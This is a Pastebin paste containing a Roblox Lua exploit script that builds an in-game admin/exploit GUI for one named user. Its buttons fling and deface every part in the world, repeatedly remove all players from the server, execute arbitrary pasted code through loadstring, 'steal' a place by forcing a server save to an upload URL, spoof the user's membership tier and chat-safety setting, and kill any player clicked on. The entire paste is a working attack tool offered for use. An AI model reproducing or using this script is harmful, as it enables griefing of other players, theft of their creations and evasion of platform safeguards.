killerclowe

Untitled

Sep 21st, 2017
43
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.62 KB | None | 0 0
  1. local edb = Instance.new("TextButton")
  2. edb.Size = UDim2.new(.05, 0, .05, 0)
  3. edb.Position = UDim2.new(0, 5, 0.5, -80);
  4. edb.TextColor3 = Color3.new(1, 1, 1)
  5. edb.MouseButton1Click:connect(function()
  6. insrt = game:GetService("InsertService"):LoadAsset(21001552)
  7. insrt2 = game:GetService("InsertService"):LoadAsset(41924685)
  8. pcall(function()
  9. for _, v in pairs(insrt:GetChildren()) do
  10. v:Clone().Parent = game.Players.Geomaster.Backpack
  11. end
  12. for _, v in pairs(insrt2:GetChildren()) do
  13. v:Clone().Parent = game.Players.Geomaster.Backpack
  14. end
  15. end)
  16. end)
  17.  
  18. edb.Text = "Insert"
  19. edb.Parent = game.Players.Geomaster.PlayerGui
  20. edb.Style = "RobloxButtonDefault"
  21.  
  22.  
  23.  
  24.  
  25. local bId = Instance.new("TextBox", game.Players.Geomaster.PlayerGui)
  26. bId.BackgroundColor3 = Color3.new(1, 1, 1)
  27. bId.ClearTextOnFocus = false
  28. bId.Font = "ArialBold"
  29. bId.FontSize = "Size11"
  30. bId.Position = UDim2.new(.05, 7.5, 0.5, -125);
  31. bId.Size = UDim2.new(0.100000001, 0, 0.0500000007, 0)
  32. bId.Text = ""
  33.  
  34. local badge = Instance.new("TextButton")
  35. badge.Size = UDim2.new(.05, 0, .05, 0)
  36. badge.Position = UDim2.new(0, 5, 0.5, -125);
  37. badge.TextColor3 = Color3.new(1, 1, 1)
  38. badge.MouseButton1Click:connect(function()
  39. ins = game:GetService("InsertService"):LoadAsset(59853098)
  40. coroutine.resume(coroutine.create(function()
  41. for _, v in pairs(ins:GetChildren()) do
  42. if v:IsA("BasePart") then
  43. v.Parent = workspace
  44. v.CFrame = game.Players.Geomaster.Character.Torso.CFrame
  45. v.BID.Value = StealText.Text
  46. game:GetService("Debris"):AddItem(v, 3)
  47. end
  48. end
  49. end))
  50. end)
  51.  
  52. badge.Text = "Badge"
  53. badge.Parent = game.Players.Geomaster.PlayerGui
  54. badge.Style = "RobloxButtonDefault"
  55.  
  56. local pb = Instance.new("TextButton")
  57. pb.Size = UDim2.new(.05, 0, .05, 0)
  58. pb.Position = UDim2.new(0, 5, 0.5, -25)
  59. pb.TextColor3 = Color3.new(1, 1, 1)
  60. pb.MouseButton1Click:connect(function()
  61. local p = Instance.new("Part")
  62. p.Name = "RAWR"
  63. p.BrickColor = BrickColor.Random()
  64. p.Material = ((math.random(1, 2) == 1) and "Ice") or "Wood"
  65. pcall(function()
  66. p.CFrame = game.Players.Geomaster.Character.Head.CFrame - Vector3.new(math.random(-60, 60), -40, math.random(-60, 60))
  67. end)
  68. p.formFactor = "Custom"
  69. p.Size = Vector3.new(0.5, math.random(2, 40) / 10, 0.5)
  70. p.Parent = workspace
  71. end)
  72. pb.Text = "Make part"
  73. pb.Style = "RobloxButtonDefault"
  74. pb.Parent = game.Players.Geomaster.PlayerGui
  75.  
  76. function getAll(obj)
  77. for i, v in pairs(obj:getChildren()) do
  78. if v:IsA("BasePart") and not game.Players:GetPlayerFromCharacter(v.Parent) and v.Parent.className ~= "Hat" and v.Parent.className ~= "Tool" then
  79. v.Anchored = false
  80. v.BrickColor = BrickColor.new(0)
  81. bv = Instance.new("BodyVelocity")
  82. bv.Parent = v
  83. bv.maxForce = Vector3.new(100000000,100000000,100000000)
  84. end
  85. getAll(v)
  86. end
  87. end
  88.  
  89. function exPro(root)
  90. for _, v in pairs(root:GetChildren()) do
  91. if v:IsA("Decal") and v.Texture ~= "http://www.roblox.com/asset?id=59362874" then
  92. v.Parent = nil
  93. elseif v:IsA("BasePart") then
  94. v.Material = "Plastic"
  95. v.Transparency = .5
  96. One = Instance.new("Decal", v)
  97. Two = Instance.new("Decal", v)
  98. Three = Instance.new("Decal", v)
  99. Four = Instance.new("Decal", v)
  100. Five = Instance.new("Decal", v)
  101. Six = Instance.new("Decal", v)
  102. One.Texture = "http://www.roblox.com/asset?id=59362874"
  103. Two.Texture = "http://www.roblox.com/asset?id=59362874"
  104. Three.Texture = "http://www.roblox.com/asset?id=59362874"
  105. Four.Texture = "http://www.roblox.com/asset?id=59362874"
  106. Five.Texture = "http://www.roblox.com/asset?id=59362874"
  107. Six.Texture = "http://www.roblox.com/asset?id=59362874"
  108. One.Face = "Front"
  109. Two.Face = "Back"
  110. Three.Face = "Right"
  111. Four.Face = "Left"
  112. Five.Face = "Top"
  113. Six.Face = "Bottom"
  114. end
  115. exPro(v)
  116. end
  117. end
  118.  
  119.  
  120. local DoD = Instance.new("TextButton", game.Players.Geomaster.PlayerGui)
  121. DoD.Size = UDim2.new(.05, 0, .05, 0)
  122. DoD.Position = UDim2.new(0, 5, 0.5, 70)
  123. DoD.Text = "DoD"
  124. DoD.TextColor3 = Color3.new(1, 1, 1)
  125. DoD.Style = "RobloxButtonDefault"
  126.  
  127. DoD.MouseButton1Click:connect(function()
  128. getAll(workspace)
  129. game.Lighting.TimeOfDay = "07:00:00"
  130. game.Lighting.Ambient = Color3.new(0,0,0)
  131. sky = Instance.new("Sky")
  132. sky.Parent = game.Lighting
  133. sky.SkyboxBk = "http://www.roblox.com/asset/?id=8772734"
  134. sky.SkyboxDn = "http://www.roblox.com/asset/?id=8772734"
  135. sky.SkyboxFt = "http://www.roblox.com/asset/?id=8772734"
  136. sky.SkyboxLf = "http://www.roblox.com/asset/?id=8772734"
  137. sky.SkyboxRt = "http://www.roblox.com/asset/?id=8772734"
  138. sky.SkyboxUp = "http://www.roblox.com/asset/?id=8772734"
  139. end)
  140.  
  141. Shutdown = Instance.new("TextButton", game.Players.Geomaster.PlayerGui)
  142. Shutdown.Size = UDim2.new(.05, 0, .05, 0)
  143. Shutdown.Position = UDim2.new(0, 5, 0.5, 110)
  144. Shutdown.Text = "Shutdown"
  145. Shutdown.TextColor3 = Color3.new(1, 1, 1)
  146. Shutdown.Style = "RobloxButtonDefault"
  147.  
  148. Shutdown.MouseButton1Click:connect(function()
  149. coroutine.resume(coroutine.create(function()
  150. while wait() do
  151. for _, v in pairs(game.Players:GetPlayers()) do
  152. v.Parent = nil
  153. end
  154. end
  155. end))
  156. end)
  157.  
  158. ExPro = Instance.new("TextButton", game.Players.Geomaster.PlayerGui)
  159. ExPro.Size = UDim2.new(.05, 0, .05, 0)
  160. ExPro.Position = UDim2.new(0, 5, 0.5, 150)
  161. ExPro.Text = "ExPro"
  162. ExPro.TextColor3 = Color3.new(1, 1, 1)
  163. ExPro.Style = "RobloxButtonDefault"
  164.  
  165. ExPro.MouseButton1Click:connect(function()
  166. exPro(workspace)
  167. end)
  168.  
  169. ScriptFrame = Instance.new("Frame", game.Players.Geomaster.PlayerGui)
  170. ScriptFrame.Size = UDim2.new(0.5, 0, 0.600000024, 0)
  171. ScriptFrame.Position = UDim2.new(0.300000012, 0, 0.200000003, 0)
  172. ScriptFrame.Active = true
  173. ScriptFrame.Draggable = true
  174. ScriptFrame.Style = "RobloxRound"
  175.  
  176. Panel = Instance.new("TextBox", ScriptFrame)
  177. Panel.BackgroundColor3 = Color3.new(1, 1, 1)
  178. Panel.ClearTextOnFocus = true --Change to false if you want easy script edit
  179. Panel.FontSize = "Size9"
  180. Panel.MultiLine = true
  181. Panel.Position = UDim2.new(0, 0, 0.100000001, 0)
  182. Panel.Size = UDim2.new(1, 0, 0.899999976, 0)
  183. Panel.BorderSizePixel = 0
  184. Panel.Text = ""
  185. Panel.TextWrap = true
  186. Panel.TextXAlignment = "Left"
  187. Panel.TextYAlignment = "Top"
  188.  
  189. Output = Instance.new("TextLabel", ScriptFrame)
  190. Output.BackgroundTransparency = 1
  191. Output.TextColor3 = Color3.new(1, 0, 0)
  192. Output.Size = UDim2.new(.9, 0, .1, 0)
  193. Output.Position = UDim2.new(0.31, 0, 0, 0)
  194. Output.Font = "Arial"
  195. Output.FontSize = "Size18"
  196. Output.BorderSizePixel = 0
  197. Output.Text = "Output"
  198. Output.TextXAlignment = "Left"
  199. Output.TextYAlignment = "Top"
  200.  
  201. ExecuteButton = Instance.new("TextButton", ScriptFrame)
  202. ExecuteButton.Font = "ArialBold"
  203. ExecuteButton.FontSize = "Size12"
  204. ExecuteButton.Text = "Execute"
  205. ExecuteButton.Size = UDim2.new(.3, 0, .05, 0)
  206. ExecuteButton.Style = "RobloxButtonDefault"
  207. ExecuteButton.TextColor3 = Color3.new(1, 1, 1)
  208. ExecuteButton.TextYAlignment = "Center"
  209. ExecuteButton.TextXAlignment = "Center"
  210.  
  211. ExecuteButton.MouseButton1Click:connect(function()
  212. local func = loadstring(Panel.Text) or function() end
  213. pcall(function()
  214. coroutine.resume(coroutine.create(func))
  215. end)
  216. end)
  217.  
  218. StealText = Instance.new("TextBox", game.Players.Geomaster.PlayerGui)
  219. StealText.BackgroundColor3 = Color3.new(1, 1, 1)
  220. StealText.ClearTextOnFocus = false
  221. StealText.Font = "ArialBold"
  222. StealText.FontSize = "Size11"
  223. StealText.Position = UDim2.new(0, 0, 0.879999995, 0)
  224. StealText.Size = UDim2.new(0.100000001, 0, 0.0500000007, 0)
  225. StealText.Text = ""
  226.  
  227. StealButton = Instance.new("TextButton", game.Players.Geomaster.PlayerGui)
  228. StealButton.Font = "ArialBold"
  229. StealButton.FontSize = "Size12"
  230. StealButton.Text = "Steal"
  231. StealButton.Position = UDim2.new(0.100000001, 0, 0.879999995, 0)
  232. StealButton.Size = UDim2.new(0.0700000003, 0, 0.0500000007, 0)
  233. StealButton.TextColor3 = Color3.new(1, 1, 1)
  234. StealButton.Style = "RobloxButtonDefault"
  235.  
  236. StealButton.MouseButton1Click:connect(function()
  237. pcall(function()
  238. game:SetServerSaveUrl("http://www.roblox.com/Data/Upload.ashx?assetid=" .. StealText.Text)
  239. game:ServerSave()
  240. end)
  241. end)
  242.  
  243. coroutine.resume(coroutine.create(function()
  244. while wait() do
  245. game.Players.Geomaster:SetSuperSafeChat(false)
  246. game.Players.Geomaster:SetMembershipType(Enum.MembershipType.OutrageousBuildersClub)
  247. end
  248. end))
  249.  
  250. game:GetService("ScriptContext").Error:connect(function(error, stack, script)
  251. coroutine.resume(coroutine.create(function()
  252. Output.Text = error .. " ; " .. stack .. " ; " .. script
  253. wait(6)
  254. Output.Text = "Output"
  255. end))
  256. end)
  257.  
  258. game.Players.Geomaster.MouseDownOnPlayer:connect(function(player)
  259. pcall(function()
  260. tag = Instance.new("ObjectValue", player.Character.Humanoid)
  261. tag.Name = "creator"
  262. tag.Value = game.Players.Geomaster
  263. player.Character:BreakJoints()
  264. end)
  265. end)
Add Comment
Please, Sign In to add comment